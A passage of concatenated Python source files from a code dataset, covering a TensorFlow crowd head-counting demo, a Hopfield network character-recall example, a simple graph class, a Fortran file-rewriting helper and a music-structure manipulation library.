help='gpu run')\n 
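# input sources: --img_dir is a folder of images; --file_in may point to a txt list, a video, or a single image\n    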
parser.add_argument('--img_dir', type=str, default='tmp/',\n                        help='Directory for images')\n    parser.add_argument('--file_in', type=str, default='tmp.txt',\n                        help='image names file')\n    return parser.parse_args()\n\n\nclass HeadCount(object):\n    def __init__(self,args):\n        self.loadtfmodel(args.modelpath)\n        self.threshold = args.threshold\n        self.img_dir = args.img_dir\n        self.real_num = 0\n\n\n    def loadtfmodel(self,mpath):\n        tf_config = tf.ConfigProto()\n        #gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.7)\n        #tf_config.gpu_options = gpu_options\n        tf_config.gpu_options.allow_growth=True \n        tf_config.log_device_placement=False\n        self.sess = tf.Session(config=tf_config)\n        # self.sess = tf.Session()\n        modefile = gfile.FastGFile(mpath, 'rb')\n        graph_def = tf.GraphDef()\n        graph_def.ParseFromString(modefile.read())\n        self.sess.graph.as_default()\n        tf.import_graph_def(graph_def, name='csr_graph') \n        # tf.train.write_graph(graph_def, './', 'breathtest.pbtxt', as_text=True)\n        # print(\"************begin to print graph*******************\")\n        # op = self.sess.graph.get_operations()\n        # for m in op:\n        #     # if 'input' in m.name or 'output' in m.name or 'confidence' in m.name:\n        #     print(m.name) #m.values())\n        # print(\"********************end***************\")\n        self.input_image = self.sess.graph.get_tensor_by_name('csr_graph/input_1:0') #img_input\n        self.net_out = self.sess.graph.get_tensor_by_name('csr_graph/output:0') #softmax_output\n\n    def display_hotmap(self,img,hotmaps):\n        '''\n        hotmaps: a list of hot maps, each of shape [1,h,w]\n        ''' \n        pred_map = hotmaps\n        # pred_map = np.transpose(pred_map,(1,2,0))\n        # pred_map = pred_map/np.max(pred_map+1e-20) \n        pred_num = str(int(np.sum(hotmaps[0])))\n        txt = \"real_num:%s - pred_num:%s\" % (str(self.real_num),pred_num)\n        fig, axes = plt.subplots(nrows=1, ncols=2, constrained_layout=True)\n        ax1 = axes[0]\n        ax1.imshow(img[:,:,::-1])\n        ax1.set_title(txt)\n        ax2 = axes[1]\n        ax2.imshow(pred_map,'jet') #cmap=CM.jet)\n        plt.savefig('test_density_2.png')\n        # plt.title(txt)\n        plt.show()\n        # pred_frame = plt.gca()\n        # plt.imshow(pred_map, 'jet')\n        # pred_frame.axes.get_yaxis().set_visible(False)\n        # pred_frame.axes.get_xaxis().set_visible(False)\n        # pred_frame.spines['top'].set_visible(False) \n        # pred_frame.spines['bottom'].set_visible(False) \n        # pred_frame.spines['left'].set_visible(False) \n        # pred_frame.spines['right'].set_visible(False) \n        # plt.savefig(exp_name+'/'+filename_no_ext+'_pred_'+str(float(pred))+'.png',\\\n        #     bbox_inches='tight',pad_inches=0,dpi=150)\n        plt.close()\n    def apply_density(self,img,hotmap):\n        # create a blank img\n        h,w,_ = img.shape\n        ih,iw = hotmap.shape[:2]\n        # img = cv2.resize(img,(iw,ih))\n        overlay = img.copy()\n        pred_num = str(int(np.sum(hotmap)))\n        point = (int(w-300),20)\n        keep_indx = np.where(hotmap>0.0001)\n        alpha = 0.5\n        cv2.rectangle(overlay, (0, 0), (img.shape[1], img.shape[0]), (255, 0, 0), -1) \n        for i in range(len(keep_indx[0])):\n            # iy = np.clip(keep_indx[0][i]/float(ih) * h,0,h-1)\n            # ix = np.clip(keep_indx[1][i]/float(iw) * w,0,w-1)\n            ix = keep_indx[1][i]\n            iy = keep_indx[0][i]\n            cv2.circle(overlay,(int(ix),int(iy)),3,(0,0,255))\n        # image = cv2.addWeighted(overlay, alpha, image, 1-alpha, 0) \n        image = cv2.addWeighted(overlay, alpha, img, 1-alpha, 0) \n        txt = \"real_num:%s - pred_num:%s\" % (str(self.real_num),pred_num)\n        cv2.putText(image,txt,point,cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\n        return image\n    \n    def propress(self,img):\n        # rgb_mean = np.array([123.,117.,104.])[np.newaxis, np.newaxis,:].astype('float32')\n        # 
rgb_mean = np.array([0.485, 0.456, 0.406])[np.newaxis, np.newaxis,:].astype('float32')\n        # rgb_std = np.array([0.229, 0.224, 0.225])[np.newaxis, np.newaxis,:].astype('float32')\n        rgb_mean = np.array([0.5, 0.5, 0.5])[np.newaxis, np.newaxis,:].astype('float32')\n        rgb_std = np.array([0.225, 0.225, 0.225])[np.newaxis, np.newaxis,:].astype('float32')\n        # img = cv2.resize(img,(1920,1080))\n        h,w = img.shape[:2]\n        gth = int(np.ceil(h/8.0)*8)\n        gtw = int(np.ceil(w/8.0)*8)\n        img = cv2.resize(img,(gtw,gth))\n        img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n        img = img.astype('float32')\n        img /= 255.0\n        img -= rgb_mean\n        img /= rgb_std\n        img = np.transpose(img,(2,0,1))\n        return img\n\n    def get_boxarea(self,img,frame):\n        '''\n        img: gray img\n        '''\n        img = img[0][0]\n        density_map = img.copy()\n        imgh,imgw = img.shape[:2]\n        frameh,framew = frame.shape[:2]\n        # print('min',np.min(img))\n        # print('max',np.max(img))\n        img = np.where(img >0.0002,255,0)\n        img = np.array(img,dtype=np.uint8)\n        # cv2.imshow('thresh',img)\n        kernelX = cv2.getStructuringElement(cv2.MORPH_RECT, (55,1 ))\n        kernelY = cv2.getStructuringElement(cv2.MORPH_RECT, (1, 55))\n        img = cv2.dilate(img, kernelX, iterations=2)\n        img = cv2.erode(img, kernelX, iterations=4)\n        img = cv2.dilate(img, kernelX, iterations=2)\n        img = cv2.erode(img, kernelY, iterations=1)\n        img = cv2.dilate(img, kernelY, iterations=2)\n        img = cv2.medianBlur(img, 3)\n        # img = cv2.medianBlur(img, 15)\n        # cv2.imshow('dilate&erode', img)\n        # findContours arguments: input image, contour retrieval mode, contour approximation method\n        # it returns the contours and their hierarchy\n        # image, contours, hier = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n        contours, _ = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n        boxes = []\n        hull = []\n        for i ,c in enumerate(contours):\n            # bounding box\n            x, y, w, h = cv2.boundingRect(c)\n            hull.append(cv2.convexHull(c, False))\n            if min(w,h) > 100:\n                x2 = int((x+w)/float(imgw) * framew)\n                y2 = int((y+h)/float(imgh) * frameh)\n                x1 = int(x/imgw *framew)\n                y1 = int(y/imgh *frameh)\n                # tmp = int(np.sum(density_map[x1:x2+1,y1:y2+1]))\n                cv2.rectangle(frame, (x1, y1), (x2, y2), (255, 0, 0), 2)\n                # cv2.putText(frame,str(tmp),(x1,y1),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\n                boxes.append([x1,y1,x2,y2])\n            # cv2.drawContours(frame, hull, i, (0, 255, 0), 1, 8)\n            cv2.polylines(frame, [hull[i]], True, (0, 255, 0), 2)\n        return frame,boxes\n\n    def inference_img(self,imgorg):\n        t1 = time.time()\n        img = self.propress(imgorg.copy())\n        img = np.expand_dims(img,0)\n        output = self.sess.run([self.net_out],feed_dict={self.input_image:img})\n        # print(\"***out shape:\",np.shape(output))\n        cnt_num = np.sum(output[0])\n        t2 = time.time()\n        print('consuming:',t2-t1)\n        img_out = self.apply_density(imgorg,output[0][0])\n        # self.display_hotmap(imgorg.copy(),output[0][0])\n        img_density,boxes = self.get_boxarea(output,imgorg)\n        return img_density ,boxes\n\n    def get_num(self,img):\n        t1 = time.time()\n        img = self.propress(img)\n        img = np.expand_dims(img,0)\n        output = self.sess.run([self.net_out],feed_dict={self.input_image:img})\n        cnt_num = np.sum(output[0])\n        return cnt_num\n\n    def headcnts(self,imgpath):\n        if os.path.isdir(imgpath):\n            cnts = os.listdir(imgpath)\n            for tmp in cnts:\n                tmppath = os.path.join(imgpath,tmp.strip())\n                img = cv2.imread(tmppath)\n                if img is None:\n                    continue\n                frame,cnt_head = self.inference_img(img)\n                print('heads >> ',cnt_head)\n                cv2.imshow('result',frame)\n                #savepath = os.path.join(self.save_dir,save_name)\n                # cv2.imwrite('test.jpg',frame)\n                cv2.waitKey(0) \n        elif os.path.isfile(imgpath) and 
imgpath.endswith('txt'):\n # if not os.path.exists(self.save_dir):\n # os.makedirs(self.save_dir)\n f_r = open(imgpath,'r')\n file_cnts = f_r.readlines()\n for j in tqdm(range(len(file_cnts))):\n tmp_file = file_cnts[j].strip()\n tmp_file_s = tmp_file.split('\\t')\n if len(tmp_file_s)>0:\n tmp_file = tmp_file_s[0]\n self.real_num = int(tmp_file_s[1])\n if not tmp_file.endswith('jpg'):\n tmp_file = tmp_file +'.jpg'\n # tmp_path = os.path.join(self.img_dir,tmp_file) \n tmp_path = tmp_file\n if not os.path.exists(tmp_path):\n print(tmp_path)\n continue\n img = cv2.imread(tmp_path) \n if img is None:\n print('None',tmp)\n continue\n frame,cnt_head = self.inference_img(img)\n cv2.imshow('result',frame)\n #savepath = os.path.join(self.save_dir,save_name)\n #cv2.imwrite('test.jpg',frame)\n cv2.waitKey(0) \n elif os.path.isfile(imgpath) and imgpath.endswith(('.mp4','.avi')) :\n cap = cv2.VideoCapture(imgpath)\n frame_width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)\n frame_height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n # print(frame_width, frame_height)\n imgw = int(frame_width)\n imgh = int(frame_height)\n fourcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G') #cv2.VideoWriter_fourcc(*\"mp4v\")\n # out = cv2.VideoWriter('test.mp4', fourcc, 25,(frame_width, frame_height))\n out = cv2.VideoWriter('test.avi', cv2.VideoWriter_fourcc('I','4','2','0'), 25, (imgw, imgh))\n if not cap.isOpened():\n print(\"failed open camera\")\n return 0\n else: \n frame_cnt = 0\n boxes = []\n while cap.isOpened():\n _,frame = cap.read()\n frame_cnt +=1\n if frame_cnt % 10 ==0:\n frame,boxes = self.inference_img(frame)\n if len(boxes)> 0:\n for tmp in boxes:\n cv2.rectangle(frame, (tmp[0], tmp[1]), (tmp[2], tmp[3]), (255, 0, 0), 2)\n out.write(frame)\n cv2.imshow('result',frame)\n q=cv2.waitKey(10) & 0xFF\n # cv2.imwrite('test_video1.jpg',frame)\n if q == 27 or q ==ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\n elif os.path.isfile(imgpath):\n img = cv2.imread(imgpath)\n # img = cv2.resize(img,(1920,1080))\n if img is not None:\n # grab next frame\n # update FPS counter\n frame,boxes = self.inference_img(img)\n # hotmaps = self.get_hotmaps(odm_maps)\n # self.display_hotmap(hotmaps)\n # keybindings for display\n if len(boxes)> 0:\n for tmp in boxes:\n img_crop = img[tmp[1]:tmp[3]+1,tmp[0]:tmp[2]+1,:]\n tmp_cnt = self.get_num(img_crop)\n cv2.putText(frame,str(tmp_cnt),(tmp[0],tmp[1]),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\n cv2.imshow('result',frame)\n cv2.imwrite('newm1.jpg',frame)\n key = cv2.waitKey(0) \n else:\n print('please input the right img-path')\n\nif __name__ == '__main__':\n args = parms()\n detector = HeadCount(args)\n imgpath = args.file_in\n detector.headcnts(imgpath)","sub_path":"src/test/demo_tf.py","file_name":"demo_tf.py","file_ext":"py","file_size_in_byte":13307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"263353174","text":"\nimport numpy as np\nimport pandas as pd\n\n\ndef create_neurons(pict):\n names = [(x,y) for x in range(5) for y in range(5)]\n neurons = pd.Series([-1]*len(names), index=names, name='Activation')\n for y, line in enumerate(pict):\n for x in range(len(line)):\n if line[x] != ' ':\n neurons[(x,y)] = 1\n else:\n neurons[(x,y)] = -1\n return neurons\n\ndef show(neurons):\n for y in range(5):\n for x in range(5):\n if neurons[(x, y)] == 1:\n print('#',end='')\n else:\n print(' ',end='')\n print('')\n\ndef learn_character(neurons, links):\n pairs = [(f,t) for f in links.index for t in links.columns if f != t]\n for 
(f,t) in pairs:\n        if neurons[f] == neurons[t]:\n            links.loc[f, t] += 1\n        else:\n            links.loc[f, t] -= 1\n\n\ndef run_hopfield(neurons, links):\n    for index, value in links.iterrows():\n        a = (value * neurons).sum()\n        if a >= 0:\n            neurons[index] = 1\n        else:\n            neurons[index] = -1\n\n\nd = create_neurons([\n    '#### ',\n    '#   #',\n    '#   #',\n    '#   #',\n    '#### '\n    ])\nj = create_neurons([\n    '#####',\n    '   # ',\n    '   # ',\n    '#  # ',\n    ' ##  '\n    ])\nc = create_neurons([\n    ' ####',\n    '#    ',\n    '#    ',\n    '#    ',\n    ' ####'\n    ])\nm = create_neurons([\n    '#   #',\n    '## ##',\n    '# # #',\n    '#   #',\n    '#   #'\n    ])\n\nshow(d)\nprint(d)\nprint('')\nshow(j)\nprint('')\nshow(c)\nprint('')\nshow(m)\nprint('')\n\nnames = [(x,y) for x in range(5) for y in range(5)]\nlinks = pd.DataFrame(np.zeros(shape=(25, 25)), index=names, columns=names)\nlinks.index.name = 'input'\nlinks.columns.name = 'output'\n\n\nprint(d)\nprint(links)\nlearn_character(d, links)\nprint(links)\nlearn_character(j, links)\nprint(links)\nlearn_character(c, links)\nprint(links)\nlearn_character(m, links)\nprint(links)\nlearn_character(m, links)\nprint(links)\n\n#print(links)\n\ninput_chr = create_neurons([\n    '#### ',\n    '   # ',\n    '   # ',\n    '#  # ',\n    ' ##  '])\n\n\n#print(links)\nprint(input_chr)\nshow(input_chr)\nrun_hopfield(input_chr, links)\nshow(input_chr)\n\n","sub_path":"machine_learning/hopfield_network/src/old/hn_char.py","file_name":"hn_char.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"361891392","text":"class Graph:\n    def __init__(self):\n        self.number_of_nodes = 0\n        self.adjacent_list = {}\n\n    def add_vertex(self, node):\n        self.adjacent_list[node] = []\n        self.number_of_nodes += 1\n\n    def add_edge(self, node1, node2):\n        self.adjacent_list[node1].append(node2)\n        self.adjacent_list[node2].append(node1)\n\n    def show_connections(self):\n        all_nodes = self.adjacent_list.keys()\n        for node in all_nodes:\n            node_connections = self.adjacent_list[node]\n            connections = \"\"\n            for vertex in node_connections:\n                connections += f\"{vertex} \"\n            print(f\"{node} ---> {connections}\")\n\ngraph = Graph()\ngraph.add_vertex('0')\ngraph.add_vertex('1')\ngraph.add_vertex('2')\ngraph.add_vertex('3')\ngraph.add_vertex('4')\ngraph.add_vertex('5')\ngraph.add_vertex('6')\ngraph.add_edge('3', '1')\ngraph.add_edge('3', '4')\ngraph.add_edge('4', '2')\ngraph.add_edge('4', '5')\ngraph.add_edge('1', '2')\ngraph.add_edge('1', '0')\ngraph.add_edge('0', '2')\ngraph.add_edge('6', '5')\n\ngraph.show_connections()\n","sub_path":"python/data_structures/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"336073430","text":"#!/bin/env python\n\nimport subprocess, sys, os, re, math\n\ninputfilename=sys.argv[1]\noutputfilename=sys.argv[2]\n\ninput_file = open(inputfilename)\noutput_file = open(outputfilename, 'w')\n\nindex=1\n\nfor line in input_file:\n\n    if line == \"      PARAMETER ( NCOMB=144)\\n\":\n        output_file.write(\"      PARAMETER ( NCOMB=128)\\n\")\n    elif \"DATA (NHEL\" in line:\n        if line.split(',')[5] != \" 0\" or line.split(',')[6] != \" 0\":\n            output_file.write(line.replace(line.split(',')[1],\" \"+str(index)+\")\"))\n            index=index+1\n    else:\n        
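# copy all other lines through to the output unchanged\n        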
output_file.write(line)\n\ninput_file.close()\noutput_file.close()\n","sub_path":"make_transverse_matrix_f.py","file_name":"make_transverse_matrix_f.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"121596617","text":"from copy import deepcopy\nfrom MusECI.MusEciDataStructures import *\nfrom random import *\n\n# =================================================================\n# OPERATIONS ON MUSICAL STRUCTURES\n# Haskell Euterpea provides a number of basic operations on the\n# Music type. Only a few of them are presented here.\n# =================================================================\n\ndef removeDurs(musicVal):\n    def stripDur(x): x.dur = None\n    mMap(stripDur, musicVal)\n\ndef removeOnsets(musicVal):\n    def stripOnset(x): x.onset = None\n    mMap(stripOnset, musicVal)\n\ndef findBy(selectFun, x):\n    retVals = []\n    if selectFun(x):\n        retVals.append(x)\n    elif x.__class__.__name__ == \"Seq\" or isinstance(x, Par):\n        for t in x.trees:\n            newVals = findBy(selectFun, t)\n            retVals = retVals+newVals\n    elif x.__class__.__name__==\"Note\" or x.__class__.__name__==\"Rest\":\n        if selectFun(x):\n            retVals.append(x)\n    elif x.__class__.__name__==\"Part\": # formerly Modify\n        newVals = findBy(selectFun, x.tree)\n        retVals = retVals+newVals\n    return retVals\n\ndef minOnset(x):\n    os = getOnsets(x)\n    retVal = None # smallest onset seen so far\n    for o in os:\n        if o==None:\n            pass\n        else:\n            if retVal==None or o < retVal:\n                retVal = o\n    if retVal==None:\n        retVal = 0\n    return retVal\n\ndef setDefaultOffset(x, defO):\n    def oFun(x):\n        if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n            if (x.onset == None):\n                x.onset = defO\n    mMapAll(oFun, x)\n\ndef shiftOnsets(x, shiftAmt):\n    def oFun(x):\n        if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n            if (x.onset != None):\n                x.onset = x.onset + shiftAmt\n    mMapAll(oFun, x)\n\ndef line(musicVals, correctOnsets=False): # Does NOT assign onsets by default.\n    \"\"\"\n    The line function builds a \"melody\" with Seq constructors\n    out of a list of musical structures. Values are NOT copied unless\n    correctOnsets is True, in which case deep copies are laid end-to-end\n    by shifting their onsets.\n    :param musicVals: a list of musical structures\n    :return: the sequential composition of the input list\n    \"\"\"\n    if correctOnsets:\n        ms = deepcopy(musicVals)\n        offset = 0\n        for m in ms:\n            mdur = durOnset(m)\n            shiftOnsets(m, offset)\n            offset = offset + mdur\n        return Seq(ms)\n    return Seq(musicVals)\n\ndef par(musicVals): # Does NOT assign onsets by default\n    \"\"\"\n    The par function builds a \"chord\" with Par constructors\n    out of a list of music substructures. 
Values are NOT copied.\n    :param musicVals: a list of music structures\n    :return: the parallel composition of the input\n    \"\"\"\n    ms = deepcopy(musicVals)\n    return Par(ms)\n\ndef deriveOnsets(x, currentTime=0):\n    #if (x.__class__.__name__ == 'Music'):\n    #    deriveOnsets(x.tree, 0)\n    if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n        if x.onset == None:\n            x.onset = currentTime\n    elif (x.__class__.__name__ == 'Seq'):\n        ct = currentTime\n        for t in x.trees:\n            deriveOnsets(t, ct)\n            ct = ct + dur(t)\n    elif isinstance(x, Par):\n        for t in x.trees:\n            deriveOnsets(t, currentTime)\n    elif (x.__class__.__name__ == 'Part'): # formerly Modify\n        deriveOnsets(x.tree, currentTime)\n    else:\n        raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\ndef getOnset(x): # We assume onsets are defined\n    if x.__class__.__name__ == \"Part\": # formerly Modify\n        return getOnset(x.tree)\n    elif x.__class__.__name__==\"Note\" or x.__class__.__name__ == \"Rest\":\n        return x.onset\n    elif x.__class__.__name__==\"Seq\":\n        return getOnset(x.trees[0]) # we assume structural correctness for Seq (first is earliest onset)\n    elif isinstance(x, Par):\n        return min([getOnset(t) for t in x.trees]) # can't really make the same assumption for Par\n    else:\n        raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\ndef durOnset(x): # WE ASSUME ALL ONSETS HAVE BEEN DERIVED (no mix of actual numbers and Nones allowed)\n    minO = min(getOnsets(x))\n    maxE = max(getEndTimes(x))\n    return maxE - minO\n\ndef getOnsets(x): # UNTESTED\n    def getter(val): return val.onset\n    return mMapAllRet(getter, x)\n\ndef getEndTimes(x): # UNTESTED\n    def getter(val): return (val.onset + val.dur)\n    return mMapAllRet(getter, x)\n\ndef scaleOnsets(x, shiftAmt):\n    def oFun(x):\n        if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n            if (x.onset != None):\n                x.onset = x.onset * shiftAmt\n    mMapAll(oFun, x)\n\ndef dur(x): # WILL NOT HANDLE ONSETS\n    \"\"\"\n    Computes the duration of a music tree. Values are relative to the overall\n    bpm for the entire tree, such that 0.25 is a quarter note.\n    :param x: the music structure\n    :return: the duration of x in whole notes (wn = 1.0)\n    \"\"\"\n    if (x.__class__.__name__ == 'Music'):\n        d = max(list(map(dur,x.trees)))\n        return d * (120/x.bpm)\n    elif (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n        return x.dur\n    elif (x.__class__.__name__ == 'Seq'):\n        return sum(map(dur,x.trees)) # THIS IS NOT RIGHT FOR ONSETS\n    elif isinstance(x, Par):\n        return max(list(map(dur,x.trees)))\n    elif (x.__class__.__name__ == 'Part'): # formerly Modify\n        #if (x.mod.__class__.__name__ == 'Tempo'):\n        #    d = dur(x.tree)\n        #    return d / x.mod.value\n        #else:\n        return dur(x.tree)\n    else:\n        raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n
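# Example usage (a minimal sketch; it assumes the Note(pitch, dur, onset, vol)\n# constructor used elsewhere in this module):\n# melody = line([Note(60, 0.25, None, 100), Note(64, 0.25, None, 100)])\n# harmony = par([Note(48, 0.5, None, 100), Note(55, 0.5, None, 100)])\n# deriveOnsets(melody) # fill in onsets sequentially starting at time 0\n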
def mMap(f, x):\n    \"\"\"\n    The mMap function maps a function over the Notes in a Music value.\n    :param f: Function to map over Notes\n    :param x: the music structure to operate on\n    :return: an in-place modification of the music structure\n    \"\"\"\n    if (x.__class__.__name__ == 'Music'):\n        for t in x.trees:\n            mMap(f, t)\n    elif (x.__class__.__name__ == 'Note'):\n        f(x)\n    elif (x.__class__.__name__ == 'Rest'):\n        pass # nothing to do to a Rest\n    elif (x.__class__.__name__ == 'Seq' or isinstance(x, Par)):\n        for t in x.trees:\n            mMap(f, t)\n    elif (x.__class__.__name__ == 'Part'): # formerly Modify\n        mMap(f, x.tree)\n    else:\n        raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\n\ndef mMapAll(f, x):\n    \"\"\"\n    The mMapAll function is not found in Haskell Euterpea but may prove useful.\n    It maps a function over Notes and Rests and applies it to the entire musical\n    structure. Note: the function MUST handle the constructors directly if using\n    something other than dur.\n    :param f: The function to apply to each Note or Rest\n    :param x: the music structure to traverse\n    :return: an in-place altered version of the music structure\n    \"\"\"\n    if (x.__class__.__name__ == 'Music'):\n        for t in x.trees:\n            mMapAll(f,t)\n    elif (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n        f(x)\n    elif (x.__class__.__name__ == 'Seq' or isinstance(x, Par)):\n        for t in x.trees:\n            mMapAll(f,t)\n    elif (x.__class__.__name__ == 'Part'): # formerly Modify\n        mMapAll(f, x.tree)\n    else:\n        raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\ndef mMapAllRet(f, x):\n    \"\"\"\n    The mMapAllRet function is like mMapAll but collects the results of\n    applying f to each Note and Rest and returns them as a list.\n    :param f: The function to apply to each Note or Rest\n    :param x: the music structure to traverse\n    :return: a list of the values returned by f\n    \"\"\"\n    if (x.__class__.__name__ == 'Music'):\n        v = list()\n        for t in x.trees:\n            v += mMapAllRet(f,t)\n        return v\n    elif (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n        return [f(x)]\n    elif (x.__class__.__name__ == 'Seq' or isinstance(x, Par)):\n        v = list()\n        for t in x.trees:\n            v += mMapAllRet(f,t)\n        return v\n    elif (x.__class__.__name__ == 'Part'):\n        return mMapAllRet(f, x.tree)\n    else:\n        raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\ndef transpose(x, amount):\n    \"\"\"\n    transpose directly alters the Notes of the supplied structure.\n    Each Note's pitch number has amount added to it.\n    :param x:\n    :param amount:\n    :return:\n    \"\"\"\n    def f(xNote): xNote.pitch = xNote.pitch+amount\n    mMap(f, x)\n\n# The following volume-related functions deviate slightly from\n# Haskell Euterpea's methods of handling volume. This is because\n# the volume is stored directly in the Note class in Python, which\n# is not the case in Haskell Euterpea. Note: volumes are not\n# guaranteed to be integers with scaleVolume. You should use\n# intVolume before converting to MIDI. 
You may wish to use\n# scaleVolumeInt instead.\n\ndef setVolume(x, volume): # set everything to a constant volume\n    def f(xNote): xNote.vol = volume\n    mMap(f,x)\n\ndef scaleVolume(x, factor): # multiply all volumes by a factor\n    def f(xNote): xNote.vol = xNote.vol * factor\n    mMap(f,x)\n\ndef scaleVolumeInt(x, factor): # multiply but then round to an integer\n    def f(xNote): xNote.vol = int(round(xNote.vol * factor))\n    mMap(f,x)\n\ndef adjustVolume(x, amount): # add a constant amount to all volumes\n    def f(xNote): xNote.vol = xNote.vol + amount\n    mMap(f,x)\n\ndef reverseInPlace(x):\n    \"\"\"\n    Reverse a musical structure in place (last note is first, etc.)\n    :param x: the music structure to reverse.\n    :return: the reversal of the input.\n    \"\"\"\n    #if (x.__class__.__name__ == 'Music'):\n    #    reverseInPlace(x.tree)\n    if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n        pass # nothing to do\n    elif (x.__class__.__name__ == 'Seq'):\n        x.trees.reverse()\n        for t in x.trees:\n            reverseInPlace(t)\n    elif (x.__class__.__name__ == 'Par' or x.__class__.__name__ == 'Music'):\n        dMax = dur(x)\n        newTrees = []\n        for t in x.trees:\n            d = dur(t)\n            reverseInPlace(t) # reverse the subtree in place, then pad it so all subtrees still end together\n            newTrees.append(Seq([Rest(dMax - d), t]))\n        x.trees = newTrees\n    elif (x.__class__.__name__ == 'Part'):\n        reverseInPlace(x.tree)\n    else: raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\ndef reverse(x): # DOES NOT HANDLE ONSETS\n    x2 = deepcopy(x)\n    reverseInPlace(x2)\n    return x2\n\ndef reverseOnsetInPlace(x): # HANDLES ONSETS. Notes must store onsets. Rests may need to be cleared and redone.\n    d = durOnset(x)\n    reverseInPlace(x)\n    def revOnset(aNote): aNote.onset = d - (aNote.onset + aNote.dur)\n    mMapAll(revOnset, x)\n    #deriveOnsets(x,0) # Might need to do this if rests are involved\n\ndef reverseOnset(x):\n    x2 = deepcopy(x)\n    reverseOnsetInPlace(x2)\n    return x2\n\ndef reverseOnsetInPlaceWithin(x, startTime, endTime): # To reverse within a larger range.\n    o = getOnset(x)\n    d = durOnset(x)\n    if (o==startTime and o+d==endTime):\n        reverseOnsetInPlace(x)\n    elif (o>=startTime and o+d <= endTime):\n        reverseInPlace(x)\n        def revOnset(aNote): aNote.onset = endTime - (aNote.onset - startTime + aNote.dur)\n        mMapAll(revOnset, x)\n        #deriveOnsets(x,0) # Might need to do this if rests are involved\n    else:\n        raise MusEciException(\"Selection must be a subset of the time span to be reversed.\")\n\ndef reverseOnsetWithin(x, startTime, endTime):\n    x2 = deepcopy(x)\n    reverseOnsetInPlaceWithin(x2, startTime, endTime)\n    return x2\n\n\ndef times(music, n): # TO-DO: ONSET HANDLING\n    \"\"\"\n    Returns a new value that is n repetitions of the input musical structure.\n    Deep copy is used, so there will be no shared references between the input\n    and the output.\n    :param music: the music structure to repeat\n    :param n: how many times to repeat?\n    :return: a new structure (so this should be called as a = times(b,n))\n    \"\"\"\n    return Seq([deepcopy(music) for _ in range(n)])\n\n\ndef cut(x, amount): # Should not be affected by onset handling\n    \"\"\"\n    Keeps only the first duration amount of a musical structure. The amount\n    is in measures at the reference duration, which is 120bpm unless specified\n    by the Music constructor. 
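For example, cut(m, 1.0) keeps just the first whole note's worth of m. 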
Note that this operation is messy - it can leave\n a lot of meaningless structure in place, with leaves occupied by Rest(0).\n :param x: the music value to alter\n :param amount: how many whole notes worth to take.\n :return: the furst amount of the music structure by time (whole note = 1.0)\n \"\"\"\n #if (x.__class__.__name__ == 'Music'):\n # cut(x.tree, amount)\n # return x\n if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n if amount <= x.dur:\n x.dur = amount\n return x\n elif (x.__class__.__name__ == 'Seq'):\n dLeft = amount\n newTree = []\n for t in x.trees:\n newTree.append(cut(t, dLeft))\n dLeft = max(0,dLeft - dur(t))\n x.trees = newTree\n return x\n elif isinstance(x, Par):\n newTrees = []\n for t in x.trees:\n newTrees.append(cut(t,amount))\n x.trees = newTrees\n return x\n elif (x.__class__.__name__ == 'Part'):\n #if (x.mod.__class__.__name__ == 'Tempo'):\n # cut(x.tree, amount*x.mod.value)\n #else:\n cut(x.tree, amount)\n return x\n else: raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\ndef remove(x, amount): # TO-DO: ONSET HANDLING (DO WE WANT IT TO NORMALIZE TO STARTING AT ZERO?)\n \"\"\"\n The opposite of \"cut,\" chopping away the first amount. Note that this\n operation is messy - it can leave a lot of meaningless structure in\n place, with leaves occupied by Rest(0).\n :param x: the music structure to alter\n :param amount: how much to cut off of the beginning?\n :return:\n \"\"\"\n if amount<=0:\n return x # nothing to remove!\n #elif (x.__class__.__name__ == 'Music'):\n # remove(x.tree, amount)\n # return x\n elif (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n if amount >= x.dur:\n x.dur = 0\n if amount < x.dur:\n x.dur = x.dur - amount\n return x\n elif (x.__class__.__name__ == 'Seq'):\n dLeft = amount\n newTree = []\n for t in x.trees:\n d = dur(t)\n newTree.append(remove(t, dLeft))\n dLeft = max(0,dLeft - d)\n x.trees = newTree\n return x\n elif isinstance(x, Par):\n newTrees = []\n for t in x.trees:\n newTrees.append(remove(t,amount))\n x.trees = newTrees\n return x\n elif (x.__class__.__name__ == 'Part'):\n #if 